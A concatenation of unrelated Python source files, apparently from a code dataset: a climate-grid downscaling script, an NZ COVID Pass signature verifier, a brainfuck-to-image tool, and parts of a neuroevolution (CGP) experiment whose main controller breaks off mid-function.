out_dat1 = basemap.interp(in_dat1, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=1) # bilinear grid - will miss edges
if type(in_dat) == np.ma.core.MaskedArray:
out_dat0 = basemap.interp(in_dat1, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=0) # nearest neighbour grid to fill edges
out_dat1[np.where(out_dat1.mask)] = out_dat0[np.where(out_dat1.mask)] # replace the masked elements in bilinear grid with the nn grid
# mask data at sea level
# out_dat1[out_elev.data < 1.0] = np.nan # no longer send in a masked array
if var in ['tmax', 'tmin']: # lapse back to new elevations
out_t_offset = out_elev * lapse
out_dat1 = out_dat1 + out_t_offset
out_dat[i, :, :] = out_dat1
elif single_dt == True:
# out_dat = np.empty([num_out_lats, num_out_lons], dtype=np.float32) * np.nan
# in_dat1 = in_dat * 1.0
if type(in_dat) == np.ma.core.MaskedArray:
in_dat.data[in_dat.mask] = np.nan
if var in ['tmax', 'tmin']: # lapse to sea level
in_t_offset = in_elev * lapse
in_dat = in_dat - in_t_offset
out_dat = basemap.interp(in_dat, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=1)
if type(in_dat) == np.ma.core.MaskedArray:
out_dat0 = basemap.interp(in_dat, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=0) # nearest neighbour grid to fill edges
out_dat[np.where(out_dat.mask)] = out_dat0[np.where(out_dat.mask)]
# mask data at sea level
# out_dat1[out_elev.data < 1.0] = np.nan # no longer send in a masked array
if var in ['tmax', 'tmin']: # lapse back to new elevations
out_t_offset = out_elev * lapse
out_dat = out_dat + out_t_offset
return out_dat.astype(np.float32)
def daily_to_hourly_temp_grids(max_temp_grid, min_temp_grid, single_dt=False):
"""
run through and process daily data into hourly, one slice at a time.
:param max_temp_grid: input data with dimension [time,y,x]
:param min_temp_grid: input data with dimension [time,y,x]
:return: hourly data with dimension [time*24,y,x]
"""
if single_dt == True: # assume is 2d and add a time dimension on the start
max_temp_grid = max_temp_grid.reshape([1, max_temp_grid.shape[0], max_temp_grid.shape[1]])
min_temp_grid = min_temp_grid.reshape([1, min_temp_grid.shape[0], min_temp_grid.shape[1]])
hourly_grid = np.empty([max_temp_grid.shape[0] * 24, max_temp_grid.shape[1], max_temp_grid.shape[2]], dtype=np.float32) * np.nan
for i in range(max_temp_grid.shape[1]):
hourly_grid[:, i, :] = process_temp(max_temp_grid[:, i, :], min_temp_grid[:, i, :])
return hourly_grid
def daily_to_hourly_swin_grids(swin_grid, lats, lons, hourly_dt, single_dt=False):
"""
converts daily mean SW into hourly using TOA rad, applying
:param hi_res_sw_rad: daily sw in data with dimension [time,y,x]
:return:
"""
if single_dt == True: # assume is 2d and add a time dimension on the start
swin_grid = swin_grid.reshape([1, swin_grid.shape[0], swin_grid.shape[1]])
num_steps_in_day = int(86400. / (hourly_dt[1] - hourly_dt[0]).total_seconds())
hourly_grid = np.ones([swin_grid.shape[0] * num_steps_in_day, swin_grid.shape[1], swin_grid.shape[2]])
lon_ref = np.mean(lons)
lat_ref = np.mean(lats)
# compute hourly TOA for reference in middle of domain #TODO explicit calculation for each grid point?
toa_ref = calc_toa(lat_ref, lon_ref, hourly_dt)
# compute daily average TOA and atmospheric transmissivity
daily_av_toa = []
for i in range(0, len(toa_ref), num_steps_in_day):
daily_av_toa.append(np.mean(toa_ref[i:i + num_steps_in_day]))
daily_trans = swin_grid / np.asarray(daily_av_toa)[:, np.newaxis, np.newaxis]
# calculate hourly sw from daily average transmisivity and hourly TOA
for ii, i in enumerate(range(0, len(toa_ref), num_steps_in_day)):
hourly_grid[i:i + num_steps_in_day] = hourly_grid[i:i + num_steps_in_day] * toa_ref[i:i + num_steps_in_day, np.newaxis, np.newaxis] * daily_trans[ii]
return hourly_grid
def load_new_vscn(variable, dt_out, nc_file_in, point=None, nc_opt=False, single_dt=False, nc_datetimes=None):
"""
load vcsn data from file for specified datetimes. transforms spatial dimensions so that latitude and longitude are increasing
:param variable: string describing the field to take. options for newVCSN data are 'rain', 'tmax', 'tmin', 'srad'
:param dt_out: array of datetimes requested
:param nc_file_in: string describing full path to netCDF file with VCSN data
:param point[y,x] : point to extract data at, where y and x refer to the array positions of point required
:param nc_opt: set to True if nc_file_in is a netCDF instance rather than a string
:return: array containing VCSN data with dimensions [time, lat, lon]
"""
if nc_opt:
nc_file = nc_file_in
else:
nc_file = nc.Dataset(nc_file_in)
if nc_datetimes is None:
nc_datetimes = nc.num2date(nc_file.variables['time'][:], nc_file.variables['time'].units)
if single_dt == False:
# nc dts are in UTC, and recorded at 9am. To get record relevant to NZST day (at 00:00), need to subtract 3 hours (12 hour offset, plus 9 hours)
index = np.where(np.logical_and(nc_datetimes >= (dt_out[0] - dt.timedelta(hours=3)),
nc_datetimes <= (dt_out[-1] - dt.timedelta(hours=3))))
else:
index = np.where(nc_datetimes == (dt_out - dt.timedelta(hours=3)))
start_idx = index[0][0]
end_idx = index[0][-1]
if variable == 'tmax' or variable == 'rain' or variable == 'srad': # take measurement (max or sum) to 9am next day
start_idx = start_idx + 1
end_idx = end_idx + 1
if point is None:
data = np.fliplr(nc_file.variables[variable][start_idx:end_idx + 1, :, :])
# flip so latitude and longitude is increasing. i.e. origin at bottom left. # fliplr flips second dimension
if single_dt:
data = np.squeeze(data)
else:
data = nc_file.variables[variable][start_idx:end_idx + 1, point[0], point[1]]
return data
if __name__ == '__main__':
# code to get elevation and lat/lon - assumes VCSN and RCM use same lat/lon
# nc_file_rain = nc.Dataset('/mnt/data/RCMData/Version6/Annual/Ann_WS10_VCSN_xairj_1971-2005c0_RCPpast.nc', 'r')
in_lats = np.genfromtxt(r"C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\lats.dat")#nc_file_rain.variables['latitude'][::-1] # source.RCM_file.latitudes()
in_lons = np.genfromtxt(r"C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\lons.dat")#nc_file_rain.variables['longitude'][:] # source.RCM_file.longitudes()
# vcsn_elev = np.flipud(nc_file_rain.variables['elevation'][:])
# vcsn_elev_interp = np.ma.fix_invalid(vcsn_elev).data
# in_elev = vcsn_elev_interp
in_elev = np.ones((260,243))
# code to get output lat/lons
# dem_folder = '/mnt/data/GIS_DATA/Topography/DEM_NZSOS/'
#catchment = 'Clutha'
dem = 'clutha_dem_250m'
#subcatchment = 'qldc_ta_area'
catchment = 'Clutha'
mask_folder = r'C:\Users\conwayjp\OneDrive - NIWA\Temp\Masks'
# dem_file = dem_folder + dem + '.tif'
# elev, easting, northing, lat_array, lon_array = setup_nztm_dem(dem_file)
# create new outlons and out_lats using trim for the qldc mask here
nztm_dem, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(dem_file=None)
mask = np.load(mask_folder + '/{}_{}.npy'.format(catchment, dem))
# qldc_mask = np.load(mask_folder + '/{}_{}.npy'.format(subcatchment, dem))
out_lats, out_lons, trimmed_mask, _, _ = trim_lat_lon_bounds(mask, lat_array, lon_array, mask.copy(), y_centres,
x_centres)
# returns: lats, lons, elev, northings, eastings
mask = trimmed_mask
#out_lons = lon_array
out_lats = np.flipud(out_lats) #(lat_array)
# northing = np.flipud(northing)
# out_elev = elev
out_elev = trimmed_mask*0.0
# # Clip to the same extent as the met data
# northing_clip = (4861875, 5127625)
# easting_clip = (1214375, 1370375)
# northing_mask = (northing >= northing_clip[0]) & (northing <= northing_clip[1])
# easting_mask = (easting >= easting_clip[0]) & (easting <= easting_clip[1])
# out_lats = out_lats[northing_mask][:, easting_mask]
# out_lons = out_lons[northing_mask][:, easting_mask]
for sce in ['RCP2.6', 'RCP4.5', 'RCP6.0','RCP8.5']:#
for v in ['T']:#
for year in ['2045','2095']:# '
# note: don't lapse the temperature e.g., call it 'rain' variable rather than temperature or use 0 lapse rate
dat_file = r'C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\NEW_{}diff_{}_{}_mean.npy'.format(v, sce, year)
# dat_file = 'D:/NEW_{}diff_{}_{}_percent.npy'.format(v, sce, year)
inp_dat = np.load(dat_file)
inp_dat = np.flipud(inp_dat)
in_dat = np.ma.masked_invalid(inp_dat)
array = in_dat#np.ma.masked_invalid(in_dat)
xx, yy = np.meshgrid(in_lons, in_lats)
# get only the valid values
x1 = xx[~array.mask]
y1 = yy[~array.mask]
newarr = array[~array.mask]
GD1 = interpolate.griddata((x1, y1), newarr.ravel(),
(xx, yy),
method='nearest')
GD1 = np.ma.masked_invalid(GD1)
var = 'rain'
lapse = 0.000
single_dt = True
hi_res_temp_2095 = interpolate_met(GD1, var, in_lons, in_lats, in_elev, out_lons, out_lats, out_elev, lapse, single_dt)
# with open('/mnt/temp/CODC/metric_plots/SavedData-change/{}diff_{}_{}_mean_downscaled_v2.npy'.format(v, sce, year), 'w') as fh:
# np.save(fh, hi_res_temp_2095)
# plt.imshow(hi_res_temp_2095.data)
# plt.colorbar()
# plt.show()
np.save(r'C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\{}diff_{}_{}_mean_downscaled_v5.npy'.format(v, sce, year), hi_res_temp_2095.data)
# np.save('D:/{}diff_{}_{}_mean_downscaled_v3.npy'.format(v, sce, year), hi_res_temp_2095.data)
``` |
{
"source": "jonodavis/NZCP-Verifier",
"score": 3
} |
#### File: jonodavis/NZCP-Verifier/verifier.py
```python
import base64
import hashlib
import json
import logging
import urllib.request
from datetime import datetime
from cbor2 import dumps, loads
from jwcrypto import jwk
from ecdsa import VerifyingKey
logging.basicConfig(level=logging.WARN,
format='%(asctime)s - %(levelname)s - %(message)s')
TRUSTED_ISSUERS = [
"did:web:nzcp.identity.health.nz",
"did:web:nzcp.covid19.health.nz" # for testing only
]
stored_dids = {}
def add_base32_padding(base32_input_no_padding):
"""Return a base32 string with the correct padding
Parameters:
base32_input_no_padding (str): base32 string without padding
"""
result = base32_input_no_padding
while ((len(result) % 8) != 0):
result += '='
return result
def check_and_remove_prefix(code):
"""Returns the NZCP code without the NZCP prefix
Parameters:
code (str): NZCP code with prefix
"""
try:
if (code[0:6] == "NZCP:/"):
logging.debug("Check prefix: PASS")
return code[6:]
else:
logging.debug("Check prefix: FAIL")
return False
except:
logging.debug("Check prefix: FAIL")
return False
def check_and_remove_version(base32_with_version):
"""Returns the NZCP code without the NZCP version
Parameters:
base32_with_version (str): NZCP code with version and without prefix
"""
try:
if (base32_with_version[0:2] == "1/"):
logging.debug("Checking version number: PASS")
return base32_with_version[2:]
else:
logging.debug("Checking version number: FAIL")
return False
except:
logging.debug("Checking version number: FAIL")
return False
def decode_base32(base32_input):
"""Returns the decoded base32 string
Parameters:
base32_input (str): base32 string
"""
try:
result = base64.b32decode(base32_input)
logging.debug("Decoding Base32: PASS")
return result
except:
logging.debug("Decoding Base32: FAIL")
return False
def decode_cbor(decoded_base32):
"""Returns the deserialized CBOR object
Parameters:
decoded_base32 (bytes): decoded base32 string
"""
try:
obj = loads(decoded_base32)
logging.debug("Decoding CBOR: PASS")
return obj
except:
logging.debug("Decoing CBOR: FAIL")
return False
def check_cwt_claims(decoded_payload):
"""Returns True if the CWT claims are valid
Parameters:
decoded_payload (dict): decoded CBOR object
"""
try:
for i in [1, 4, 5, 7, 'vc']:
if i not in decoded_payload:
logging.debug("Checking CWT headers: FAIL")
return False
if decoded_payload[1] not in TRUSTED_ISSUERS:
logging.debug("Checking CWT headers: FAIL")
return False
logging.debug("Checking CWT headers: PASS")
return True
except:
logging.debug("Checking CWT headers: FAIL")
return False
def check_exp_date(decoded_payload):
"""
Returns True if the expiry date is in the future
Parameters:
decoded_payload (dict): decoded CBOR object
"""
try:
if datetime.now() > datetime.utcfromtimestamp(decoded_payload[4]):
logging.debug("Checking expiry date: FAIL")
return False
logging.debug("Checking expiry date: PASS")
return True
except:
logging.debug("Checking expiry date: FAIL")
return False
def check_nbf_date(decoded_payload):
"""
Returns True if the not before date is in the past
Parameters:
decoded_payload (dict): decoded CBOR object
"""
try:
if datetime.now() < datetime.utcfromtimestamp(decoded_payload[5]):
logging.debug("Checking not before date: FAIL")
return False
logging.debug("Checking not before date: PASS")
return True
except:
logging.debug("Checking not before date: FAIL")
return False
def decode_UUID(encoded_UUID):
"""Returns the decoded UUID
Parameters:
encoded_UUID (bytes): encoded UUID
"""
try:
if len(encoded_UUID) != 16:
logging.debug("Checking UUID length: FAIL")
return False
result = encoded_UUID.hex()
result = result[0:8] + "-" + result[8:12] + "-" + \
result[12:16] + "-" + result[16:20] + "-" + result[20:32]
result = "urn:uuid:" + result
logging.debug("Decoding UUID: PASS")
return result
except:
logging.debug("Decoding UUID: FAIL")
return False
def get_DID_from_issuer(iss):
"""Returns the DID fetched from the issuer
Parameters:
iss (str): issuer
"""
try:
url = iss.replace("did:web:", "https://")
url += "/.well-known/did.json"
response = urllib.request.urlopen(url)
did_json = json.loads(response.read())
stored_dids[iss] = did_json
logging.debug("Getting DID from issuer: PASS")
return did_json
except:
logging.debug("Getting DID from issuer: FAIL")
return False
def validate_DID(iss, protected_headers, did):
"""Returns True if the DID is valid
Parameters:
iss (str): issuer
protected_headers (dict): decoded protected headers
did (dict): DID retrieved from the issuer
"""
try:
absolute_key_reference = iss + "#" + protected_headers[4].decode()
if absolute_key_reference not in did["assertionMethod"]:
logging.debug("Validating DID: FAIL")
return False
if did["verificationMethod"][0]["type"] != "JsonWebKey2020":
logging.debug("Validating DID: FAIL")
return False
logging.debug("Validating DID: PASS")
return True
except:
logging.debug("Validating DID: FAIL")
return False
def get_issuer_public_key_from_did(did):
"""Returns the public key from the DID
Parameters:
did (dict): DID retrieved from the issuer
"""
try:
issuer_publc_key = did["verificationMethod"][0]["publicKeyJwk"]
logging.debug("Extracting public key from issuer DID: PASS")
return issuer_publc_key
except:
logging.debug("Extracting public key from issuer DID: FAIL")
return False
def convert_jwk_to_pem(jwt_public_key):
"""Returns the public key in PEM format
Parameters:
jwt_public_key (dict): public key in JWK format
"""
try:
json_jwt = json.dumps(jwt_public_key)
key = jwk.JWK.from_json(json_jwt)
pem_key = key.export_to_pem()
logging.debug("Converting JWK to PEM: PASS")
return pem_key
except:
logging.debug("Converting JWK to PEM: FAIL")
return False
def generate_sig_structure(protected_headers, payload):
"""Returns the encoded signature structure
Parameters:
protected_headers (dict): decoded protected headers
payload (dict): decoded payload
"""
try:
sig_structure = ["Signature1"]
sig_structure.append(protected_headers)
sig_structure.append(b'') # type: ignore
sig_structure.append(payload)
logging.debug("Generating Sig_structure: PASS")
return dumps(sig_structure)
except:
logging.debug("Generating Sig_structure: FAIL")
return False
def validate_signature(signature, pem_key, message):
"""Returns True if the signature is valid
Parameters:
signature (bytes): digital signature
pem_key (bytes): public key in PEM format
message (bytes): signature structure to be verified
"""
try:
public_key = VerifyingKey.from_pem(pem_key, hashfunc=hashlib.sha256)
result = public_key.verify(signature, message, hashfunc=hashlib.sha256)
logging.debug("Validating digital signature: PASS")
return result
except:
logging.debug("Validating digital signature: FAIL")
return False
def construct_response(validated, decoded_COSE_payload=None, uuid=None, error=None):
"""Returns the correctly formatted response to be sent to the client
Parameters:
validated (bool): True if the NZCP is valid
decoded_COSE_payload (dict): decoded COSE payload (default None)
uuid (str): UUID (default None)
"""
# EXAMPLE VALIDATED RESPONSE
# {
# "verified": true,
# "payload": {
# "givenName": "Samantha",
# "familyName": "Gill",
# "dob": "1984-08-07"
# },
# "metadata": {
# "expiry": "2022-02-20T12:34:56.000Z",
# "notBefore": "2020-01-20T12:34:56.000Z",
# "id": "urn:uuid:850a1de1-f890-4be5-b105-d721e5f3bc98",
# "issuer": "did:web:example.com",
# "type": "PublicCovidPass"
# }
# }
res = {}
try:
if validated:
res["verified"] = validated
res["payload"] = decoded_COSE_payload["vc"]["credentialSubject"]
res["metadata"] = {}
res["metadata"]["expiry"] = datetime.utcfromtimestamp(
decoded_COSE_payload[4]).isoformat()
res["metadata"]["notBefore"] = datetime.utcfromtimestamp(
decoded_COSE_payload[5]).isoformat()
res["metadata"]["id"] = uuid
res["metadata"]["issuer"] = decoded_COSE_payload[1]
res["metadata"]["type"] = decoded_COSE_payload["vc"]["type"][1]
logging.debug("Constructing response: PASS")
return res
else:
res["verified"] = validated
if error:
res["error"] = error
else:
res["error"] = "Unknown error"
logging.debug("Constructing response: PASS")
return res
except:
logging.debug("Constructing response: FAIL")
res["verified"] = False
res["error"] = "Unknown error"
return res
def check_code(code_to_check):
"""Checks whether NZCP is valid and returns the response to be sent to the client
Parameters:
code_to_check (str): NZCP to be checked
"""
try:
base32_input_without_prefix = check_and_remove_prefix(code_to_check)
if not base32_input_without_prefix:
return construct_response(False, error="Error checking NZCP prefix")
base32_input = check_and_remove_version(base32_input_without_prefix)
if not base32_input:
return construct_response(False, error="Error checking NZCP version number")
padded = add_base32_padding(base32_input)
decoded = decode_base32(padded)
if not decoded:
return construct_response(False, error="Error decoding base32")
decoded_COSE_structure = decode_cbor(decoded).value # type: ignore
if not decoded_COSE_structure:
return construct_response(False, error="Error decoding CBOR")
decoded_COSE_protected_headers = decode_cbor(decoded_COSE_structure[0])
if not decoded_COSE_protected_headers:
return construct_response(False, error="Error decoding CBOR")
decoded_COSE_payload = decode_cbor(decoded_COSE_structure[2])
if not decoded_COSE_payload:
return construct_response(False, error="Error decoding CBOR")
if not check_cwt_claims(decoded_COSE_payload):
return construct_response(False, error="Error checking CWT claims")
if not check_exp_date(decoded_COSE_payload):
return construct_response(False, error="Expiry date is in the past")
if not check_nbf_date(decoded_COSE_payload):
return construct_response(False, error="Not before date is in the future")
decoded_UUID = decode_UUID(decoded_COSE_payload[7])
if not decoded_UUID:
return construct_response(False, error="Error decoding UUID")
if decoded_COSE_payload[1] in stored_dids:
did_json = stored_dids[decoded_COSE_payload[1]]
else:
did_json = get_DID_from_issuer(decoded_COSE_payload[1])
if not did_json:
return construct_response(False, error="Error retrieving DID from issuer")
if not validate_DID(decoded_COSE_payload[1], decoded_COSE_protected_headers, did_json):
return construct_response(False, error="Error validating DID")
signature = decoded_COSE_structure[3]
issuer_public_key = get_issuer_public_key_from_did(did_json)
if not issuer_public_key:
return construct_response(False, error="Error extracting public key from issuer DID")
pem_key = convert_jwk_to_pem(issuer_public_key)
to_be_signed = generate_sig_structure(
decoded_COSE_structure[0], decoded_COSE_structure[2])
if not to_be_signed:
return construct_response(False, error="Error generating Sig_structure")
validated = validate_signature(signature, pem_key, to_be_signed)
if not validated:
return construct_response(False, error="Error validating digital signature")
return construct_response(validated, decoded_COSE_payload, decoded_UUID)
except:
return construct_response(False)
def main():
logging.warning("Run application.py to start the server")
if __name__ == "__main__":
main()
``` |
{
"source": "jonoddram/brainpaint",
"score": 4
} |
#### File: jonoddram/brainpaint/createimage.py
```python
import brainfrick
import argparse
import binary_support
from PIL import Image
import math
"""
Works by reading off 3 cell values for each pixel going in order rgb from the memory contents of the brainfrick VM
after finishing execution of loaded program.
"""
parse = argparse.ArgumentParser(description="Input paramaters for brainpaint")
parse.add_argument("--input_path", help="Path to brainfrick code")
parse.add_argument("--output_path", help="Path where output should be saved")
parse.add_argument("--xdim", help="Specifies the x-dimension of the output image")
parse.add_argument("--ydim", help="Specifies the y-dimension of the output image")
args = vars(parse.parse_args())
code_file = open(args["input_path"], 'r')
program = code_file.read()
code_file.close()
bf = brainfrick.Brainfrick(30000, 9) # using 9 bit cells as a values for rgb are given between 0 and 255, and the msb
# is used for negative and positive numbers (negative numbers don't make sense for images but it does make sense to
# support them in the other functions)
bf.insert_program(program)
bf.run()
memory = bf.memory
dim1, dim2 = int(args["xdim"]), int(args["ydim"])
last_index = dim1*dim2*3
memory = memory[:last_index]
new_memory = []
# make every number positive
for bin_num in memory:
num = binary_support.make_integer(bin_num)
if num < 0:
num = -num
new_memory.append(num)
# map every number to a value between 0 and 255, use this if changing bits per cell
# map256 = binary_support.map_to(max(new_memory)-min(new_memory), 256)
# memory_map256 = map(map256, new_memory)
# deprecated in favour of user specified image dimensions
def approximate_dimensions(size):
size = size/3 # because there are 3 cells per pixel
square = math.sqrt(size)
return int(math.ceil(square)), int(math.ceil(square))
image = Image.new("RGBA", (dim1, dim2))
for num1 in range(dim2):
# for each row
for num2 in range(dim1):
# for each column
cellsInPreviousRows = num1*dim1 # amount of rows visited * length of row
nextRed = (cellsInPreviousRows+num2)*3 # pixels in previous rows + visited pixels in this row + 1 (+1 implicit
# this being next iteration) gives next
# times three since there are three memory cells per pixel
val1, val2, val3 = new_memory[nextRed], new_memory[nextRed+1], new_memory[nextRed+2] # Going in order RGB
print(num2, num1)
image.putpixel((num2, num1), (val1, val2, val3, 255)) # (num2, num1) since num1 is y and num2 is x
image.save(args["output_path"])
image.close()
``` |
{
"source": "jonoddram/CGP_Neuron_Masters",
"score": 2
} |
#### File: jonoddram/CGP_Neuron_Masters/Logger.py
```python
import os.path
import json
import time
import yaml
from os import mkdir
class Logger:
def __init__(self, output_dir, ignored_messages_list = [], enabled = True) -> None:
self.output_dir = output_dir + str(time.time())
mkdir(self.output_dir)
self.ignored_messages_list = ignored_messages_list
self.intermediary_output_dir = ""
self.intermediary_intermediary_output_dir = ""
self.message_type_to_filepath = {
"cgp_function_exec_prio1" : "exec_message_log.txt",
"cgp_function_exec_prio2" : "exec_message_log.txt",
"CGPProgram image" : "cgp_program_image.txt",
"neuron_image" : "neuron_image.txt",
"graphlog_instance" : "graphlogs_instances.txt",
"graphlog_run" : "graphlog_run.txt",
"setup_info" : "setup_info.txt"
}
self.buffer = []
self.enabled = enabled
def log_statistic_data(self, statistic_data):
with open(os.path.join(self.output_dir, "statistics.yml"), 'w') as f:
yaml.dump(statistic_data, f)
def log(self, message_type, message):
if self.enabled:
if message_type not in self.ignored_messages_list:
if message_type == "instance_end":
if len(self.buffer) > 0:
with open(self.intermediary_intermediary_output_dir + "/rundat.txt", 'a') as f:
f.writelines("\n".join(self.buffer))
self.buffer = []
elif message_type == "run_start":
self.intermediary_output_dir = self.output_dir + f"/{message[0]}"
mkdir(self.intermediary_output_dir)
self.intermediary_output_dir = self.output_dir + f"/{message[0]}/{message[1]}"
mkdir(self.intermediary_output_dir)
elif message_type == "instance_start":
self.intermediary_intermediary_output_dir = self.intermediary_output_dir + f"/{message}"
mkdir(self.intermediary_intermediary_output_dir)
elif message_type == "engine_action" or message_type == "instance_solution" or message_type == "instance_results" or message_type == "reward_phase" or message_type == "run_end":
self.buffer.append(f"{message}")
else:
with open(os.path.join(self.output_dir, self.message_type_to_filepath[message_type]), 'a') as f:
f.writelines(message + "\n")
def log_cgp_program(self, active_nodes, output_nodes):
if self.enabled:
node_types = [f"({node.id}, {node.gettype()})" for node in active_nodes]
connection_pairs = []
for node in active_nodes:
for subscriber in node.subscribers:
connection_pairs.append(f"({node.id}, {subscriber.id})")
self.log(
"CGPProgram image",
"Active nodes: " + ", ".join(node_types) + "\n" +
"Connection pairs: " + ", ".join(connection_pairs) + "\n" +
"Output_nodes: " + ", ".join([str(node.id) for node in output_nodes])
)
def log_json(self, message_type, json_data):
if self.enabled:
if message_type not in self.ignored_messages_list:
# Log json
with open(os.path.join(self.output_dir, self.message_type_to_filepath[message_type]), 'a') as f:
json.dump(json_data, f)
f.write("|")
```
#### File: jonoddram/CGP_Neuron_Masters/MainController.py
```python
import time
import json
from numpy import diag
from engine import NeuronEngine
from genotype import Genome
import Logger
import stupid_problem_test
import random
from HelperClasses import Counter, randchoice, copydict, randcheck, copydict
import os
from multiprocessing import Pool
def multiprocess_code(engine_problem):
engine = engine_problem[0]
problem = engine_problem[1]
num = engine_problem[2]
to_return = engine.run(problem, num)
return to_return
def log_genome(genomes, runinfo):
for genome in genomes:
initial_data = {
"genome id" : genome[0].id,
"genome fitness" : genome[1],
"run" : runinfo
}
genome[0].log(initial_data)
def process_config(config):
config = dict(config)
for key, val in config.items():
if "," in val:
config[key] = val.split(',')
if config[key][0].isnumeric():
for num2 in range(len(config[key])):
config[key][num2] = int(config[key][num2])
elif "." in val:
config[key] = float(val)
elif config[key] == "False":
config[key] = False
elif config[key] == "True":
config[key] = True
else:
nums = [str(x) for x in range(0, 10)]
for num in nums:
if num in val:
config[key] = int(val)
break
return config
def run(config, print_output = False):
# Setup problems
problem = stupid_problem_test.StupidProblem()
# Setup logging
# ["CGPProgram image", "cgp_function_exec_prio1", "cgp_function_exec_prio2", "graphlog_instance", "graphlog_run", "setup_info"]
logger = Logger.Logger(os.path.join(os.path.dirname(__file__), "logfiles") + "\\log", config['logger_ignore_messages'], config['advanced_logging'])
# Setup CGP genome
# - define a counter
counter = Counter()
neuron_internal_states = config['neuron_internal_state_count']
dendrite_internal_states = config['axon_dendrite_internal_state_count']
signal_dimensionality = config['signal_dimensionality']
dimensions = 3 # other dimensions not supported - code in engine.py specific to 3d grid
hox_variant_count = config['hox_variant_count']
genome_counter = Counter()
genome_count = config['genome_count']
seed = config['seed']
random.seed(seed)
estimated_calls = 1.1*config['genome_count']*config['iterations']*config['cgp_program_size']*config['actions_max']*2*config['instances_per_iteration']
print(f"Estimated upper limit to calls to CGP node primitives: {estimated_calls}")
print(f"Estimated total computation time at upper limit: {500*estimated_calls/1600000} seconds")
print(f"Based on limited empirical data actual computation time will often be up to 70 times as low.")
logger.log_json("setup_info", dict(config))
# - define the function arities
# also define canonical order of functions - arbitrary, for compatibilitiy with
# neuron code
# RFE move out this order to some single source of knowledge
neuron_function_order = [
'axon_birth_program',
'signal_axon_program',
'recieve_axon_signal_program',
'recieve_reward_program',
'move_program',
'die_program',
'neuron_birth_program',
'action_controller_program',
'hox_variant_selection_program',
'internal_state_variable_count' # not function but parameter comes here in the order
]
neuron_function_arities = [ # by order above
[dimensions+neuron_internal_states+1 + len(config['cgp_function_constant_numbers']), 4+signal_dimensionality+neuron_internal_states], # axon birth
[signal_dimensionality+dimensions+neuron_internal_states + len(config['cgp_function_constant_numbers']), 2 + signal_dimensionality + neuron_internal_states], # signal axon
[signal_dimensionality + dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2 + neuron_internal_states+signal_dimensionality], # recieve signal axon
[1 + dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2 + neuron_internal_states], # reciee reward
[neuron_internal_states + dimensions + len(config['cgp_function_constant_numbers']), 7+neuron_internal_states], # move
[dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2+neuron_internal_states], # die
[dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2+neuron_internal_states*2], # neuron birth
[neuron_internal_states+dimensions + len(config['cgp_function_constant_numbers']), 9], # action controller
[neuron_internal_states + dimensions + len(config['cgp_function_constant_numbers']), hox_variant_count] # hox selection
]
dendrite_function_order = [
'recieve_signal_neuron_program',
'recieve_signal_dendrite_program',
'signal_dendrite_program',
'signal_neuron_program',
'accept_connection_program',
'break_connection_program',
'recieve_reward_program',
'die_program',
'action_controller_program'
]
dendrite_function_arities = [
[dendrite_internal_states + signal_dimensionality + dimensions + len(config['cgp_function_constant_numbers']), 2+signal_dimensionality+dendrite_internal_states],
[dendrite_internal_states + signal_dimensionality + dimensions + len(config['cgp_function_constant_numbers']), 2+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality + len(config['cgp_function_constant_numbers']), 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality + len(config['cgp_function_constant_numbers']), 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states + len(config['cgp_function_constant_numbers']), 2+dendrite_internal_states], # Accept connection
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states + len(config['cgp_function_constant_numbers']), 1], # Break connection
[dimensions + dendrite_internal_states + 1 + len(config['cgp_function_constant_numbers']), 2 + dendrite_internal_states], # recieve reward
[dimensions + dendrite_internal_states + len(config['cgp_function_constant_numbers']), 1+signal_dimensionality], # die
[dendrite_internal_states + dimensions + len(config['cgp_function_constant_numbers']), 3]
]
# Knowledge duplication thooo
def genome_to_init_data(genome):
neuron_init_data = {
'axon_birth_programs' : genome.function_chromosomes[0],
'signal_axon_programs' : genome.function_chromosomes[1],
'recieve_axon_signal_programs': genome.function_chromosomes[2],
'recieve_reward_programs': genome.function_chromosomes[3],
'move_programs': genome.function_chromosomes[4],
'die_programs': genome.function_chromosomes[5],
'neuron_birth_programs': genome.function_chromosomes[6],
'action_controller_programs': genome.function_chromosomes[7],
'hox_variant_selection_program': genome.hex_selector_genome.program,
'internal_state_variable_count': neuron_internal_states
}
axon_init_data = {
'recieve_signal_neuron_programs' : genome.function_chromosomes[8],
'recieve_signal_dendrite_programs' : genome.function_chromosomes[9],
'signal_dendrite_programs' : genome.function_chromosomes[10],
'signal_neuron_programs' : genome.function_chromosomes[11],
'accept_connection_programs' : genome.function_chromosomes[12],
'break_connection_programs' : genome.function_chromosomes[13],
'recieve_reward_programs' : genome.function_chromosomes[14],
'die_programs' : genome.function_chromosomes[15],
'action_controller_programs' : genome.function_chromosomes[16],
'internal_state_variable_count': dendrite_internal_states
}
return neuron_init_data, axon_init_data
genome_successor_count = 4
if not config['non_crossover_children']:
genome_successor_count = 2
# initialize the genome(s)
all_function_arities = neuron_function_arities + dendrite_function_arities
genomes = []
for num in range(genome_count):
genomes.append(Genome(
homeobox_variants = hox_variant_count,
successor_count = genome_successor_count,
input_arities = all_function_arities,
counter = counter,
internal_state_variables = neuron_internal_states,
names = neuron_function_order[:-1] + dendrite_function_order,
logger = logger,
genome_counter = genome_counter,
config = config)) # TODO RN assumes equal amount of axon and neuron internal state variables
from engine import NeuronEngine
# learning loop
to_return_fitness = []
learning_iterations = config['iterations']
grid_count = config['grid_count']
grid_size = config['grid_size']
actions_max = config['actions_max']
instances_per_iteration = config['instances_per_iteration']
genome_results = []
